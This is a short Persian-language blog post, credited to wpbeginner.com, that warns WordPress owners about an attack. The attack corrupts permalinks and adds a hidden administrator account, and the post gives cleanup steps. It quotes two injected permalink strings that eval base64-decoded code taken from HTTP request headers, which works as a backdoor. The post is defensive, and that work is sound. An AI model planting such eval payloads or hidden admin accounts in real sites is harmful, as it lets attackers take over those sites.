سایت های بسیاری مورد حمله SQL جدید قرار گرفته اند که در آن کدی به سایت شما تزریق میشود. این تزریق MySQL لینک ثابت شما را با تخریب آنها، از کار می اندازد. در نتیجه، پست های وبلاگ شما کار نمیکنند. وبلاگ های وردپرس زادی وجود دارند که هدف این حمله میباشند و ما باید از Andy Soward به خاطر جلب توجه ما به این مورد تشکر کنیم.
در این حمله یکی از دو کد زیر به ساختار لینک ثابت ما اضافه میشود:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
این نقل قول ها به تمام لینک های ثابت شما افزودن شده و فقط با حذف دستی از بین میروند.
برای حل این مشکل به قسمت تنظیمات لینک پایدار رفته و کد پیش فرض خود را عوض کنید. کار بعدی شما این است که به قسمت کاربران بروید. خواهید دید که بیش از یک Administrator وجود دارد. نام آنها در لیست نیست، ولی خواهید دید که شمارنده افزایش پیدا کرده است. تنها کاری که باید بکنید این است که از بین کاربران، آخرین کاربر ثبت نام شده را انتخاب کنید. ماوس خود را روی آن نگهدارید تا لینک را بدست آورید. سپس کد =userid را با اضافه کردن ۱ به آن عدد تغییر دهید. اگر آخرین کاربری که می بینید شماره ۲ باشد، با اضافه کردن ۱ به آن عدد ۳ را بدست خواهید آورد. شما باید admin مخفی را که یک کد عجیب و غریب را بجای نام خود انتخاب کرده است پیدا کنید. این کد را پاک کنید و او را مشترک کنید. سپس برگشته و اکانت را پاک کنید.
میتوانید با مراجعه مستقیم به PHPMyAdmin نیز این کاربر را پاک کنید. چون یافتن این کاربر آنجا ساده تر است.
منبع : www.wpbeginner.com
دیدگاه ها